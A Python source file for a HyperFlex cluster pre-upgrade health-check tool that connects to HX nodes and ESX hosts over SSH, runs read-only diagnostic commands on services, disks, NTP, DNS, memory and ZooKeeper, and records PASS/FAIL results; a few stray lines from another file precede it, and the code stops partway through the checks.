# test_suite.addTest(unittest.makeSuite(TestCase))
# unittest.TextTestRunner(verbosity=2).run(test_suite)
a = MultipleSocketsListener([('127.0.0.1', 0)], queue_size=5)
|
HXTool.py
|
# -*- coding: utf-8 -*-
"""
Created on 9-Mar-2018
Updated on 29-Apr-2020
@author: Kiranraj(kjogleka), Himanshu(hsardana), Komal(kpanzade), Avinash(avshukla)
"""
import warnings
warnings.filterwarnings('ignore')
import subprocess
import paramiko
import threading
import time
import datetime
import logging
import sys
import os
import shutil
import getpass
import re
import json
import tarfile
from prettytable import PrettyTable, ALL
from collections import OrderedDict
from progressbar import ProgressBarThread
from multiprocessing import Process
# Global Variables
toolversion = 4.2
builddate = "2021-04-29"
sedNote = False
lsusbCheck = False
######################## Logger #################################
INFO = logging.INFO
DEBUG = logging.DEBUG
ERROR = logging.ERROR
def get_date_time():
return (datetime.datetime.now().strftime("%Y-%m-%d_%I-%M-%S"))
def log_start(log_file, log_name, lvl):
# Create a folder
cdate = datetime.datetime.now()
global dir_name
dir_name = "HX_Report_" + str(cdate.strftime("%Y_%m_%d_%H_%M_%S"))
try:
os.makedirs(dir_name)
except FileExistsError:
shutil.rmtree(dir_name)
os.makedirs(dir_name)
os.chdir(dir_name)
# Configure logger file handler
global logger
log_level = lvl
logger = logging.getLogger(log_name)
logger.setLevel(log_level)
# Create a file handler
handler = logging.FileHandler(log_file)
handler.setLevel(log_level)
# Create a logging format
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', '%Y-%m-%d %I:%M:%S')
handler.setFormatter(formatter)
# Add the handlers to the logger
logger.addHandler(handler)
msg = "HX Checkup Tool Started at Date/Time :" + get_date_time().replace("_", "/") + "\r"
global start_time
start_time = datetime.datetime.now()
logger.info(msg)
#log_msg("", msg)
logger.info("Logger Initialized\r")
def log_stop():
# Exit the logger and stop the script, used for traceback error handling
log_msg(INFO, "Closing logger and exiting the application\r")
msg = "HX Checkup Tool Stopped at Date/Time :" + get_date_time().replace("_", "/") + "\r"
log_msg(INFO, msg)
end_time = datetime.datetime.now()
time_diff = end_time - start_time
msg = "Test duration: " + str(time_diff.seconds) + " seconds"
log_msg(INFO, msg)
logging.shutdown()
def log_entry(cmd_name):
# Each function will call this in the beginning to enter any DEBUG info
logger.log(DEBUG, 'Entered command :' + cmd_name + "\r")
def log_exit(cmd_name):
# Each function will call this in the end, to enter any DEBUG info
logger.log(DEBUG, 'Exited command :' + cmd_name + "\r")
def log_msg(lvl, *msgs):
# Each function will call this to enter any INFO msg
msg = ""
if len(msgs)>1:
for i in msgs:
msg = msg + str(i) + "\r\n"
msg.rstrip("\r\n")
else:
for i in msgs:
msg = msg + str(i)
# Print on Console & log
for line in msg.split("\r\n"):
if lvl == "" and line != "":
print(line)
elif line != "":
logger.log(lvl, line)
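# Usage: log_msg(INFO, "msg") writes to the log file only, log_msg("", "msg") prints to
# the console only, and passing several strings logs each one on its own line.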
def sys_exit(val):
# Shutdown the logger handler
try:
log_stop()
except Exception:
pass
sys.exit(val)
#################### SSH connection #####################
def runcmd(cmd, display=True):
# Execute local shell command
log_entry(cmd)
log_msg(INFO, "$" * 61 + "\r")
log_msg(INFO, "\r\nExecuting Shell command: " + cmd + "\r")
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
cmdoutput, err = p.communicate()
p_status = p.wait()
output = cmdoutput.split("\n")
log_msg(INFO, "*" * 24 + " CMD OUTPUT " + "*" * 24 + "\r")
if display:
for line in output:
log_msg(INFO, str(line) + "\r")
log_msg(INFO, "*" * 61 + "\r")
return cmdoutput
def execmd(cmd):
# Execute command
log_entry(cmd)
log_msg(INFO, "#" * 61 + "\r")
log_msg(INFO, "\r\nExecuting command: " + cmd + "\r")
stdin, stdout, stderr = client.exec_command(cmd)
while not stdout.channel.exit_status_ready():
time.sleep(1)
response = stdout.channel.exit_status
output = []
if response == 0:
for line in stdout:
output.append(line.strip())
else:
for line in stderr:
output.append(line.strip())
output.insert(0,"Not able to run the command")
log_msg(INFO, "*"*24 + " CMD OUTPUT " + "*"*24 + "\r")
for line in output:
log_msg(INFO, line +"\r")
log_msg(INFO, "*" * 61 + "\r")
log_exit(cmd)
return output
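# Note: execmd() runs a command over the module-level paramiko SSH `client` (connected
# by the callers below), waits for the exit status, and returns the stdout lines on
# success or the stderr lines prefixed with "Not able to run the command" on failure.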
def check_psd(ips, hxusername, hxpassword, esxpassword, time_out):
log_msg(INFO, "\r\nChecking the HX root password\r")
ip = ips[0]
esxip = ""
try:
# Initiate SSH Connection
client.connect(hostname=ip, username=hxusername, password=hxpassword, timeout=time_out)
msg = "\r\nSSH connection established to HX Node: " + ip + "\r"
log_msg(INFO, msg)
# Get ESX IP
cmd = "/opt/springpath/storfs-mgmt-cli/getLocalNode.sh | grep 'esxiIP=' | cut -d= -f2"
op = execmd(cmd)
if "Not able to run the command" not in op:
esxip = str(op[0]).strip()
log_msg(INFO, "\r\nValid HX root password\r")
except Exception as e:
msg = "\r\nNot able to establish SSH connection to HX Node: " + ip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
log_msg(INFO, "\r\nInvalid HX root password\r")
log_msg("", "\r\nInvalid HX root password\r")
sys.exit(0)
if esxip != "":
log_msg(INFO, "\r\nChecking the ESX root password\r")
try:
# Initiate SSH Connection
client.connect(hostname=esxip, username=hxusername, password=esxpassword, timeout=time_out)
msg = "\r\nSSH connection established to ESX Host: " + esxip + "\r"
log_msg(INFO, msg)
log_msg(INFO, "\r\nValid ESX root password\r")
except Exception as e:
msg = "\r\nNot able to establish SSH connection to ESX Host: " + esxip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
log_msg(INFO, "\r\nInvalid ESX root password\r")
log_msg("", "\r\nInvalid ESX root password\r")
sys.exit(0)
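# The thread_* helpers below each operate on a single node: thread_geteth0ip collects
# the node's eth0 address, thread_sshconnect fills hostd with hostname, NTP source,
# installed springpath packages, eth0/ESXi IPs, iptables rule count and the keystore
# md5sum, and thread_timestamp records the node's current date.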
def thread_geteth0ip(ip, hxusername, hxpassword, time_out):
try:
# Initiate SSH Connection
client.connect(hostname=ip, username=hxusername, password=hxpassword, timeout=time_out)
msg = "\r\nSSH connection established to HX Node: " + ip + "\r"
log_msg(INFO, msg)
#log_msg("", msg)
#cmd = "hostname -i"
cmd = "ifconfig eth0 | grep 'inet addr:' | cut -d: -f2| cut -d' ' -f1"
hxip = execmd(cmd)
eth0_list.extend(hxip)
client.close()
except Exception as e:
msg = "\r\nNot able to establish SSH connection to HX Node: " + ip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
def thread_sshconnect(ip, hxusername, hxpassword, time_out):
hostd[str(ip)] = dict.fromkeys(["hostname", "date", "ntp source", "package & versions", "check package & versions", "eth1", "esxip", "vmk0", "vmk1", "iptables count", "check iptables", "keystore"], "")
try:
# Initiate SSH Connection
client.connect(hostname=ip, username=hxusername, password=hxpassword, timeout=time_out)
msg = "\r\nSSH connection established to HX Node: " + ip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
# Check hostname
try:
cmd = "hostname"
hname = execmd(cmd)
hostd[ip]["hostname"] = ("".join(hname)).encode("ascii", "ignore")
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# Check NTP source
try:
cmd = "stcli services ntp show"
hntp = execmd(cmd)
hntp = [i for i in hntp if "----" not in i]
hostd[ip]["ntp source"] = (",".join(hntp)).encode("ascii", "ignore")
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# check package and versions
try:
#cmd = "dpkg -l | grep -i springpath | cut -d' ' -f3,4-"
cmd = "dpkg -l | grep -i springpath | grep -v storfs-support* | cut -d' ' -f3,4-"
op = execmd(cmd)
pkgl = []
for s in op:
pkgl.append(s[:65])
hostd[ip]["package & versions"] = pkgl
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# Get eth0 IP Address
try:
cmd = "ifconfig eth0 | grep 'inet addr:' | cut -d: -f2| cut -d' ' -f1"
eth0ip = execmd(cmd)
hostd[ip]["eth0"] = ("".join(eth0ip)).encode("ascii", "ignore")
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# Get vmk0 and vmk1 IP Address
try:
#cmd = "/usr/share/springpath/storfs-misc/run-on-esxi.sh 'esxcfg-vmknic -l'"
# Get ESX IP
cmd = "/opt/springpath/storfs-mgmt-cli/getLocalNode.sh | grep 'esxiIP=' | cut -d= -f2"
op = execmd(cmd)
if op:
esxip = op[0]
hostd[ip]["esxip"] = str(esxip)
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# check Iptables count
try:
cmd = "iptables -L -n | wc -l"
ipt = execmd(cmd)
hostd[ip]["iptables count"] = ("".join(ipt)).encode("ascii", "ignore")
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# Get keystore file
try:
cmd = "md5sum /etc/springpath/secure/springpath_keystore.jceks"
op = execmd(cmd)
if op:
keystoreFile = op[0]
hostd[ip]["keystore"] = keystoreFile.strip()
except Exception as e:
log_msg(ERROR, str(e) + "\r")
except Exception as e:
msg = "\r\nNot able to establish SSH connection to HX Node: " + ip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
finally:
client.close()
def thread_timestamp(ip, hxusername, hxpassword, time_out):
try:
# Initiate SSH Connection
client.connect(hostname=ip, username=hxusername, password=hxpassword, timeout=time_out)
msg = "\r\nSSH connection established to HX Node: " + ip + "\r"
log_msg(INFO, msg)
#log_msg("", msg)
# Check date
try:
cmd = 'date "+%D %T"'
hdate = execmd(cmd)
hostd[ip]["date"] = ("".join(hdate)).encode("ascii", "ignore")
except Exception as e:
log_msg(ERROR, str(e) + "\r")
except Exception as e:
msg = "\r\nNot able to establish SSH connection to HX Node: " + ip + "\r"
log_msg(INFO, msg)
#log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
finally:
client.close()
def get_vmk1(ip, hxusername, esxpassword, time_out):
esxip = hostd[ip].get("esxip", "")
if esxip != "":
vmknode = ""
try:
# Initiate SSH Connection
client.connect(hostname=esxip, username=hxusername, password=esxpassword, timeout=time_out)
msg = "\r\nSSH connection established to ESX Host: " + esxip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
# Check vMotion Enabled
try:
cmd = "vim-cmd hostsvc/vmotion/netconfig_get | grep -i selectedVnic"
op = execmd(cmd)
vmst = "FAIL"
for line in op:
if "unset" in line:
vmst = "FAIL"
elif "VMotionConfig" in line:
vmst = "PASS"
v = re.search(r"vmk\d", line)
if v:
vmknode = v.group()
esx_vmotion[esxip]["vmotion"] = vmst
esx_vmotion[esxip]["vmknode"] = vmknode
except Exception as e:
log_msg(ERROR, str(e) + "\r")
# Get vmk0 and vmk1 IP Address
try:
cmd = "esxcfg-vmknic -l"
op = execmd(cmd)
for line in op:
if "vmk1" in line and "IPv4" in line:
m = re.search(r"([\d]{1,3}(.[\d]{1,3}){3})", line)
if m:
vmk1 = str(m.group(1))
hostd[ip]["vmk1"] = vmk1
vmk1_list.append(vmk1)
vmk1_mtu[vmk1] = {}
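# Record the largest ICMP payload that fits the vmk1 MTU without fragmentation:
# 28 bytes of IP + ICMP headers leave 1472 bytes for an MTU of 1500 and 8972 bytes
# for an MTU of 9000 (payload sizes presumably used by the ping checks elsewhere
# in this tool).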
if " 1500 " in line:
vmk1_mtu[vmk1]["mtu"] = "1472"
elif " 9000 " in line:
vmk1_mtu[vmk1]["mtu"] = "8972"
except Exception as e:
log_msg(ERROR, str(e) + "\r")
except Exception as e:
msg = "\r\nNot able to establish SSH connection to ESX Host: " + esxip + "\r"
log_msg(INFO, msg)
log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
finally:
client.close()
def pingstatus(op):
pgst = "PASS"
for line in op:
if "Not able to run the command" in line or "Network is unreachable" in line:
pgst = "FAIL"
elif "0 packets received" in line or "100% packet loss" in line or " 0 received" in line:
pgst = "FAIL"
elif ", 0% packet loss" in line:
pgst = "PASS"
return pgst
def cluster_services_check(ip):
# 1) stcli cluster info
cldict = {}
# Get Healthstate
cmd = "stcli cluster info | grep -i healthState: | cut -d: -f2"
op = execmd(cmd)
cldict["HealthState"] = "".join(op)
# Get State
cmd = "stcli cluster info | grep -i ^State: | cut -d: -f2"
op = execmd(cmd)
cldict["State"] = "".join(op)
log_msg(INFO, str(cldict) + "\r")
# 2) sysmtool --ns cluster --cmd healthdetail
cmd = "sysmtool --ns cluster --cmd healthdetail"
cl_health = execmd(cmd)
cl_health_reason = []
flag2 = flag3 = flag4 = 0
global nodes
nodes = ""
for line in cl_health:
if line.startswith("Cluster Health Detail:"):
flag2 = 1
continue
if flag2 == 1 and line.startswith("State:"):
s = str(line.split(": ")[-1]).lower()
if cldict["State"] == s :
pass
else:
cldict["State"] = s
continue
if flag2 == 1 and "HealthState:" in line:
h = str(line.split(": ")[-1]).lower()
if cldict["HealthState"] == h:
continue
else:
cldict["HealthState"] = h
flag3 = 1
if flag3 == 1 and "Health State Reason:" in line:
flag4 = 1
continue
if flag4 == 1:
if not line.startswith("#"):
break
else:
cl_health_reason.append(line)
if flag2 == 1 and "Current ensemble size:" in line:
nodes = line.strip().split(": ")[1]
break
log_msg(INFO, str(cldict) + "\r")
hostd[ip].update(cldict)
# 3) service_status.sh
cmd = "service_status.sh"
cl_service = execmd(cmd)
# pidof storfs
cmd = "pidof storfs"
op = execmd(cmd)
for line in op:
s = line.strip()
if s.isdigit():
cl_service.append("storfs {:>44}".format("... Running"))
else:
cl_service.append("storfs {:>44}".format("... Not Running"))
# pidof stMgr
cmd = "pidof stMgr"
op = execmd(cmd)
for line in op:
s = line.strip()
if s.isdigit():
cl_service.append("stMgr {:>45}".format("... Running"))
else:
cl_service.append("stMgr {:>45}".format("... Not Running"))
# pidof stNodeMgr
cmd = "pidof stNodeMgr"
op = execmd(cmd)
for line in op:
s = line.strip()
if s.isdigit():
cl_service.append("stNodeMgr {:>41}".format("... Running"))
else:
cl_service.append("stNodeMgr {:>41}".format("... Not Running"))
# 4) sysmtool --ns cluster --cmd enospcinfo
cmd = "sysmtool --ns cluster --cmd enospcinfo"
cl_space = execmd(cmd)
free_capacity = ""
ENOSPC_warning = ""
space_state = ""
enospc_state = ""
enospc_state_check = "FAIL"
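# Compare free capacity against the ENOSPC warning threshold. Both values carry a unit
# suffix (T/G/M); when the suffixes differ, the free-capacity figure is rescaled before the
# comparison, and the cluster space state is reported as healthy/unhealthy accordingly.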
for line in cl_space:
if "Free capacity:" in line:
free_capacity = line.strip().split(": ")[1]
if "ENOSPC warning:" in line:
ENOSPC_warning = line.strip().split(": ")[1]
if free_capacity[-1] == ENOSPC_warning[-1]:
if float(free_capacity[:-1])>= float(ENOSPC_warning[:-1]):
space_state = "healthy"
else:
space_state = "unhealthy"
elif free_capacity[-1] == "T":
if (float(free_capacity[:-1])*1024)>= float(ENOSPC_warning[:-1]):
space_state = "healthy"
else:
space_state = "unhealthy"
elif free_capacity[-1] == "G":
if (float(free_capacity[:-1])*1024)>= float(ENOSPC_warning[:-1]):
space_state = "healthy"
else:
space_state = "unhealthy"
elif free_capacity[-1] == "M":
if (float(free_capacity[:-1])*1024*1024)>= float(ENOSPC_warning[:-1]):
space_state = "healthy"
else:
space_state = "unhealthy"
for line in cl_space:
if "Enospc state:" in line:
l = line.split(": ")
if len(l) == 2:
enospc_state = l[1]
if "ENOSPACE_CLEAR" in enospc_state.strip():
enospc_state_check = "PASS"
break
# 5) stcli cleaner info
cmd = "stcli cleaner info"
clop = execmd(cmd)
cl_cleaner_state = ""
# Get eth1 ip address
cmd = "ifconfig eth1 | grep 'inet addr:' | cut -d: -f2| cut -d' ' -f1"
op = execmd(cmd)
eth1ip = ""
if op:
eth1ip = op[0]
for line in clop:
if eth1ip in line or ip in line:
if "online" in line.lower():
cl_cleaner_state = "online"
elif "offline" in line.lower():
cl_cleaner_state = "offline"
break
# 6) Data Replication Factor
cmd = "stcli cluster info | grep 'dataReplicationFactor:' | tail -1 | cut -d: -f2"
op = execmd(cmd)
rf = ""
if op:
rf = op[0].strip()
# Update Test Detail info
testdetail[ip]["Cluster services check"] = OrderedDict()
# State
testdetail[ip]["Cluster services check"]["State"] = cldict["State"]
# HealthState
testdetail[ip]["Cluster services check"]["HealthState"] = cldict["HealthState"]
# Services
testdetail[ip]["Cluster services check"]["Services"] = cl_service
# Space state
testdetail[ip]["Cluster services check"]["Space State"] = space_state
# Enospc state
testdetail[ip]["Cluster services check"]["Enospc State"] = enospc_state
# Cleaner state
testdetail[ip]["Cluster services check"]["Cleaner Info"] = cl_cleaner_state
# Data Replication Factor
testdetail[ip]["Cluster services check"]["Replication Factor"] = rf
# Update Test summary
cluster_service_chk = "FAIL"
if cldict["State"] == "online":
cluster_service_chk = "PASS"
if cldict["HealthState"] == "healthy":
cluster_service_chk = "PASS"
for line in cl_service:
if "Springpath File System" in line and "Not" in line:
cluster_service_chk = "FAIL"
break
elif line.startswith("SCVM Client") and "Not" in line:
cluster_service_chk = "FAIL"
break
elif "System Management Service" in line and "Not" in line:
cluster_service_chk = "FAIL"
break
elif line.startswith("Cluster IP Monitor") and "Not" in line:
cluster_service_chk = "FAIL"
break
testsum[ip]["Cluster services check"] = {"Status": cluster_service_chk, "Result": "Checks storfs, stMgr, sstNodeMgr service running on each node."}
testsum[ip]["Enospc state check"] = {"Status": enospc_state_check, "Result": "Checks if the cluster storage utilization is above threshold."}
def zookeeper_check(ip):
# ZooKeeper and Exhibitor check
# 1) Mode
# echo srvr | nc localhost 2181
cmd = "echo srvr | nc localhost 2181"
zkl = execmd(cmd)
mode = ""
for line in zkl:
if "Mode:" in line:
mode = line.split(": ")[1]
# 2) Services
# pidof exhibitor
cmd = "pidof exhibitor"
exhl = execmd(cmd)
exh_service = ""
exh_comm = []
zcond1 = 0
for line in exhl:
s = line.strip()
if s.isdigit():
exh_service = "exhibitor {:>32}".format("... Running")
else:
exh_service = "exhibitor {:>32}".format("... Not Running")
zcond1 = 1
if zcond1 == 1:
cmd = "ls /etc/springpath/*"
op = execmd(cmd)
exh_comm.append("Files in the path[/etc/springpath/*]")
for line in op:
exh_comm.append(line.strip())
cmd = "ls /opt/springpath/config/*"
op = execmd(cmd)
exh_comm.append("\nFiles in the path[/opt/springpath/config/*]")
for line in op:
exh_comm.append(line.strip())
# 3) Check exhibitor.properties file exists
cmd = "ls /etc/exhibitor/exhibitor.properties"
op = execmd(cmd)
prop_file = ""
for line in op:
if "Not able to run the command" in line:
prop_file = "Not Exists"
break
elif "exhibitor.properties" in line and not("cannot access" in line):
prop_file = "Exists"
else:
prop_file = "Not Exists"
# Epoch Issue
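# The acceptedEpoch and currentEpoch files are read so both values appear in the report;
# a currentEpoch that lags behind acceptedEpoch is a known condition that can prevent
# ZooKeeper from starting, so a mismatch between the two is worth flagging.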
# 4) Accepted Epoch value
# 5) Current Epoch value
cmd = "grep -m1 '' /var/zookeeper/version-2/acceptedEpoch"
op = execmd(cmd)
acflag = 0
for line in op:
if "Not able to run the command" in line or "No such file or directory" in line:
acflag = 1
if acflag:
accepoch = ""
else:
accepoch = "".join(op)
cmd = "grep -m1 '' /var/zookeeper/version-2/currentEpoch"
op = execmd(cmd)
cuflag = 0
for line in op:
if "Not able to run the command" in line or "No such file or directory" in line:
cuflag = 1
if cuflag:
curepoch = ""
else:
curepoch = "".join(op)
# 6) Disk usage
# Each should be less than 80%
cmd = "df -h | grep -i '/var/stv\|/var/zookeeper\|/sda1'"
diskop = execmd(cmd)
zdiskchk = "PASS"
zdisk = ""
for line in diskop:
if "Not able to run the command" in line:
zdiskchk = "NA"
break
elif "/sda1" in line:
m1 = re.search(r"(\d+)%", line)
if m1:
if int(m1.group(1)) > 80:
zdiskchk = "FAIL"
zdisk = "/sda1"
break
elif "/var/stv" in line:
m2 = re.search(r"(\d+)%", line)
if m2:
if int(m2.group(1)) > 80:
zdiskchk = "FAIL"
zdisk = "/var/stv"
break
elif "/var/zookeeper" in line:
m3 = re.search(r"(\d+)%", line)
if m3:
if int(m3.group(1)) > 80:
zdiskchk = "FAIL"
zdisk = "/var/zookeeper"
break
# Update Test Detail info
testdetail[ip]["ZooKeeper and Exhibitor check"] = OrderedDict()
# Mode
testdetail[ip]["ZooKeeper and Exhibitor check"]["Mode"] = mode
# Current ensemble size
testdetail[ip]["ZooKeeper and Exhibitor check"]["Current ensemble size"] = nodes
# Services
testdetail[ip]["ZooKeeper and Exhibitor check"]["Services"] = exh_service
# exhibitor.properties file
testdetail[ip]["ZooKeeper and Exhibitor check"]["exhibitor.properties file"] = prop_file
# Accepted Epoch value
testdetail[ip]["ZooKeeper and Exhibitor check"]["Accepted Epoch value"] = accepoch
# Current Epoch value
testdetail[ip]["ZooKeeper and Exhibitor check"]["Current Epoch value"] = curepoch
# Disk Usage
testdetail[ip]["ZooKeeper and Exhibitor check"]["System Disks Usage"] = {"Status": zdiskchk, "Result": zdisk}
# Update Test summary
zoo_chk = "FAIL"
exh_chk = "FAIL"
if mode == "follower" or mode == "leader" or mode == "standalone":
zoo_chk = "PASS"
if "running" in exh_service.lower():
exh_chk = "PASS"
testsum[ip]["Zookeeper check"] = {"Status": zoo_chk, "Result": "Checks if Zookeeper service is running."}
testsum[ip]["Exhibitor check"] = {"Status": exh_chk, "Result": "Checks if Exhibitor in running."}
testsum[ip]["System Disks Usage"] = {"Status": zdiskchk, "Result": "Checks if /sda1, var/stv and /var/zookeeper is less than 80%."}
def hdd_check(ip):
# HDD health check
# sysmtool --ns disk --cmd list
# sysmtool --ns disk --cmd list | grep -i claimed | wc -l
# Claimed Disks
cmd = "sysmtool --ns disk --cmd list | grep -i claimed | wc -l"
op = execmd(cmd)
cdsk = ""
for line in op:
cdsk = line.strip()
# sysmtool --ns disk --cmd list | grep -i blacklisted | wc -l
# Blacklisted Disks
cmd = "sysmtool --ns disk --cmd list | grep -i blacklisted | wc -l"
op = execmd(cmd)
bdsk = ""
bdisklist = []
for line in op:
bdsk = line.strip()
if bdsk != "":
cmd = "sysmtool --ns disk --cmd list"
opl = execmd(cmd)
flg1 = flg2 = 0
for line in opl:
if "UUID:" in line:
flg1 = 1
flg2 = 0
continue
if flg1 == 1 and "State:" in line and "BLACKLISTED" in line:
flg2 = 1
flg1 = 0
continue
if flg2 == 1 and "Path:" in line:
ln = line.split(": ")
if len(ln) == 2:
bdisklist.append(ln[1])
logger.info("Blacklisted Disks: " + ",".join(bdisklist) + "\r")
# sysmtool --ns disk --cmd list | grep -i ignored | wc -l
# Ignored Disks
cmd = "sysmtool --ns disk --cmd list | grep -i ignored | wc -l"
op = execmd(cmd)
idsk = ""
for line in op:
idsk = line.strip()
# Update Test Detail info
testdetail[ip]["HDD Health check"] = OrderedDict()
# Claimed
testdetail[ip]["HDD Health check"]["Claimed"] = cdsk
#Blacklisted
testdetail[ip]["HDD Health check"]["Blacklisted"] = {"Status": bdsk, "Result": "\n".join(bdisklist)}
# Ignored
testdetail[ip]["HDD Health check"]["Ignored"] = idsk
# Update Test summary
hd_chk = "PASS"
if int(bdsk) > 0:
hd_chk = "FAIL"
testsum[ip]["HDD Health check"] = {"Status": hd_chk, "Result": "Checks if any drive is in blacklisted state."}
def pre_upgrade_check(ip):
# Pre-Upgrade Check
# 1) Check HX Cluster version
cmd = "stcli cluster version"
hxvs = execmd(cmd)
vflag = False
global sedflag
for line in hxvs:
if "Cluster version" in line:
l = line.split(": ")
if len(l) == 2:
version = l[1]
#Cluster version: Version(4.0.2a-35118)
if "Version" in version:
m = re.search(r"\((.+)\)", version)
if m:
hostd[ip]["version"] = m.group(1)
else:
hostd[ip]["version"] = version.strip()
if l[1].startswith("1.8"):
vflag = True
# 2) NTP daemon running check
ntp_deamon_check = "FAIL"
cmd = "ps aux | grep ntp"
ntp_deamon = ""
op = execmd(cmd)
for line in op:
match = re.search(r"^ntp \s+\d+", line)
if match:
ntp_deamon = match.group()
ntp_deamon_check = "PASS"
msg = "\r\nNTP deamon running check: " + str(ntp_deamon) + "\r"
log_msg(INFO, msg)
# 3) NTP Sync Check
cmd = "ntpq -p -4 | grep '^*'"
ntpsl = execmd(cmd)
ntp_sync_check = "FAIL"
ntp_sync_line = ""
flag1 = 0
for line in ntpsl:
if "Not able to run the command" in line:
ntp_sync_check = "FAIL"
elif line.startswith("*"):
l = line.split()
ntp_sync_line = l[0]
ntp_sync_check = "PASS"
break
# 4) DNS check
cmd = "stcli services dns show"
op = execmd(cmd)
dnsip = ""
dns_check = "FAIL"
digop = []
for line in op:
match = re.search(r"(?:\d{1,3}.){3}\d{1,3}", line)
if match:
dnsip = match.group()
msg = "\r\nDNS IP Address: " + str(dnsip) + "\r"
log_msg(INFO, msg)
if dnsip:
cmd = "dig @{}".format(dnsip)
dns_check = "FAIL"
digop = execmd(cmd)
for line in digop:
if "HEADER" in line and "status: NOERROR" in line:
dns_check = "PASS"
break
elif "OPT PSEUDOSECTION:" in line:
break
digop = [(str(l).rstrip()).replace("\t", " "*5) for l in digop]
# Update Test summary
if dns_check == "PASS":
testsum[ip]["DNS check"] = {"Status": "PASS", "Result": "Checks if configured DNS is reachable."}
else:
testsum[ip]["DNS check"] = {"Status": "FAIL", "Result": "Please verify DNS resolution and connectivity."}
# 5) vCenter Reachability check
cmd = "stcli cluster info | grep vCenterURL"
op = execmd(cmd)
vcenterip = ""
vcenter_check = "FAIL"
for line in op:
match = re.search(r"(?:\d{1,3}.){3}\d{1,3}", line)
if match:
vcenterip = match.group()
msg = "\r\nvCenter IP Address: " + str(vcenterip) + "\r"
log_msg(INFO, msg)
else:
try:
l = line.split(": ")
if len(l) == 2:
dnip = l[1]
dnip = dnip.replace("https://", "")
vcenterip = dnip.strip()
msg = "\r\nvCenter IP Address: " + str(vcenterip) + "\r"
log_msg(INFO, msg)
except Exception:
pass
if vcenterip:
cmd = "ping {} -c 3 -i 0.01".format(vcenterip)
op = execmd(cmd)
vcenter_check = pingstatus(op)
# Update Test summary
# vCenter Reachability check
if vcenter_check == "FAIL":
testsum[ip]["vCenter reachability check"] = {"Status": vcenter_check, "Result": "Check manually network connectivity."}
else:
testsum[ip]["vCenter reachability check"] = {"Status": vcenter_check, "Result": "Checks if vCenter is network reachable using PING."}
# Timestamp check
testsum[ip]["Timestamp check"] = {"Status": str(hostd[ip]["date check"]), "Result": "Checks if the timestamp is same across all Nodes."}
# ntp source check
if ntp_deamon_check == "PASS" and hostd[ip]["ntp source check"] == "PASS" and ntp_sync_check == "PASS":
testsum[ip]["NTP sync check"] = {"Status": "PASS", "Result": "Checks if the NTP is synced with NTP server."}
else:
testsum[ip]["NTP sync check"] = {"Status": "FAIL", "Result": "Checks if the NTP is synced with NTP server."}
# Check package & versions
testsum[ip]["Check package & versions"] = {"Status": str(hostd[ip]["check package & versions"]), "Result": "Checks for count and version of HX packages on each node."}
# Check Iptables count
testsum[ip]["Check Iptables count"] = {"Status": str(hostd[ip]["check iptables"]), "Result": "Checks if the IP Table count matches on all nodes."}
# 6) Check cluster usage
cmd = "stcli cluster storage-summary | grep -i nodeFailuresTolerable"
op = execmd(cmd)
op = "".join(op)
op = op.strip()
if ":" in op:
NFT = op.split(":")[1]
else:
NFT = "NA"
cmd = "stcli cluster storage-summary | grep -i cachingDeviceFailuresTolerable"
op = execmd(cmd)
op = "".join(op)
op = op.strip()
if ":" in op:
HFT = op.split(":")[1]
else:
HFT = "NA"
cmd = "stcli cluster storage-summary | grep -i persistentDeviceFailuresTolerable"
op = execmd(cmd)
op = "".join(op)
op = op.strip()
if ":" in op:
SFT = op.split(":")[1]
else:
SFT = "NA"
# 7) Check cache is spread across all controllers
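# "nfstool -- -m" lists cache vnode placement; "sort -u -k2" keeps one line per owning
# controller IP, so the number of unique IPs collected below should match the pnode count.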
cmd = "nfstool -- -m | sort -u -k2"
cachl = []
op = execmd(cmd)
for line in op:
m = re.search(r"^\d+\s+([\d]{1,3}(.[\d]{1,3}){3})", line)
if m:
cachl.append(str(m.group(1)))
# 8) Check any extra number of pnodes
cmd = "stcli cluster info | grep -i pnode -n2 | grep -i name | wc -l"
op = execmd(cmd)
op = "".join(op)
pnodes = int(op)
check_cache_vnodes = ""
if cachl:
if pnodes == len(cachl):
check_cache_vnodes = "PASS"
else:
check_cache_vnodes = "FAIL"
snodes = len(eth1_list)
nodecheck = "FAIL"
if pnodes == snodes:
nodecheck = "PASS"
testsum[ip]["Extra pnodes check"] = {"Status": nodecheck, "Result": "Checks for any stale Node entry."}
# 9) check packages and versions(Moved to Thread)
# 10) check memory
cmd = "free -m | grep Mem:"
op = execmd(cmd)
check_memory = "NA"
if op:
for line in op:
l = line.split()
frmem = int(l[-1])
if int(frmem) >= 2048:
check_memory = "PASS"
else:
check_memory = "FAIL"
if check_memory == "FAIL":
testsum[ip]["Memory usage check"] = {"Status": "FAIL", "Result": "Contact TAC"}
else:
testsum[ip]["Memory usage check"] = {"Status": check_memory, "Result": "Checks for available memory more than 2GB."}
# 11) check CPU
cmd = "top -b -n 1 | grep -B7 KiB"
check_cpu = execmd(cmd)
if not check_cpu:
cmd = "top -b -n 1 | grep Cpu"
check_cpu = execmd(cmd)
# 12) check Out of memory
cmd = "grep -ia 'out of memory' /var/log/kern.log"
op = execmd(cmd)
if op:
if "Not able to run the command" in op:
check_oom = ["No issue"]
testsum[ip]["Incidence of OOM in the log file"] = {"Status": "PASS",
"Result": "Checks for any previous incidence of Out Of Memory Condition."}
else:
check_oom = op
testsum[ip]["Incidence of OOM in the log file"] = {"Status": "FAIL",
"Result": "Checks for any previous incidence of Out Of Memory Condition."}
else:
check_oom = ["No issue"]
testsum[ip]["Incidence of OOM in the log file"] = {"Status": "PASS",
"Result": "Checks for any previous incidence of Out Of Memory Condition."}
# 13) ESXi supported upgrade
